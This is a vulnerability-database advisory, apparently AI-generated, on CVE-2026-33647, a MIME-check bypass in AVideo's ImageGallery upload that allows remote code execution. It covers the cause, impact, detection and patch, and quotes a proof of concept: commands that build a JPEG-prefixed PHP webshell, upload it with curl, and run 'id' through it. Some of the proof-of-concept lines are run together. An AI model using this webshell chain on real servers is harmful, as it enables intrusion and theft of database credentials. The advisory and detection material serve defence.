
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33647 is a Remote Code Execution (RCE) vulnerability in WWBN AVideo caused by a MIME type/file extension mismatch in the ImageGallery::saveFile() method. It affects all versions of AVideo up to and including 26.0. The vulnerability was published on March 22–23, 2026, with a patch committed shortly after. It carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, AVideo Advisory).
The root cause is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). In plugin/ImageGallery/ImageGallery.php, the saveFile() method validates uploaded file content using PHP's finfo MIME type detection (inspecting magic bytes), but derives the saved filename extension directly from the attacker-controlled $file['name'] field without any allowlist check. An attacker crafts a polyglot file beginning with valid JPEG magic bytes (\xff\xd8\xff\xe0) followed by PHP code, naming it with a .php extension. The MIME check passes (the file is identified as image/jpeg), but the file is saved as an executable .php file in the web-accessible videos/{videoFilename}/ImageGallery/ directory. The root .htaccess blocks extensions matching php[a-z0-9]+ but not plain .php, and no .htaccess exists in the upload target directory to disable PHP execution, leaving the uploaded webshell directly accessible and executable (AVideo Advisory).
Successful exploitation allows an authenticated attacker to execute arbitrary PHP code as the web server process (e.g., www-data). This enables reading sensitive configuration files such as videos/configuration.php (which contains database credentials), full database access, reading/modifying/deleting any file accessible to the web server, lateral movement within the server's network, and potential privilege escalation depending on server configuration. The upload response also returns the exact URL of the uploaded file, giving the attacker immediate access to their webshell (AVideo Advisory).
A detailed proof-of-concept exploit with step-by-step instructions, exact curl commands, and expected responses is publicly available in the GitHub security advisory (AVideo Advisory). Exploitation requires only a low-privilege authenticated account that owns at least one Image or Gallery type video, making the barrier to exploitation low on instances with open user registration. The EPSS score is approximately 0.39% (60th percentile), and there is no current evidence of in-the-wild exploitation or CISA KEV catalog listing (Github Advisory).
printf '\xff\xd8\xff\xe0\x00\x10JFIF' > shell.php
echo '<?php system($_GET["c"]); ?>' >> shell.phpimage/jpeg by finfo:file --mime-type shell.php
# Expected: shell.php: image/jpegcurl -b 'PHPSESSID=<session_id>' \
-F "upl=@shell.php;filename=shell.php" \
'https://target/plugin/ImageGallery/upload.json.php?videos_id=<video_id>'.php file (e.g., https://target/videos/video_filename/ImageGallery/67890abcdef12.php).curl 'https://target/videos/video_filename/ImageGallery/67890abcdef12.php?c=id'
# Expected: uid=33(www-data) gid=33(www-data) groups=33(www-data)(AVideo Advisory)/plugin/ImageGallery/upload.json.php with a multipart file upload where the filename ends in .php (or other executable extensions); subsequent GET requests to paths matching videos/*/ImageGallery/*.php with query parameters like ?c= or ?cmd=..php files in videos/{videoFilename}/ImageGallery/ directories; files in that directory beginning with JPEG magic bytes (\xff\xd8\xff\xe0) but containing PHP code.upload.json.php followed by GET requests to .php files under the videos/ path; PHP error logs showing execution of system commands from within the videos/ directory.www-data spawning sh, bash, curl, wget, or python) originating from the AVideo upload directory.
(AVideo Advisory)Apply the patch in commit 345a8d3ece0ad1e1b71a704c1579cbf885d8f3ae, which refactors saveFile() to derive the saved file extension from the detected MIME type (via an allowlist map) rather than from the user-supplied filename, eliminating the extension mismatch (AVideo Patch). As a defense-in-depth workaround, add a .htaccess file to the videos/ directory to disable PHP execution (php_flag engine off) and restrict direct access. Additionally, implement strict server-level controls such as using Content-Disposition headers to force file downloads rather than execution in upload directories (AVideo Advisory).
The vulnerability was covered by The Hacker Wire, which published a technical write-up on the MIME type bypass in AVideo's file upload (The Hacker Wire). The advisory was noted on Bluesky and tracked by several CVE aggregation services shortly after publication. No major vendor statements beyond the GitHub advisory or significant broader media coverage have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."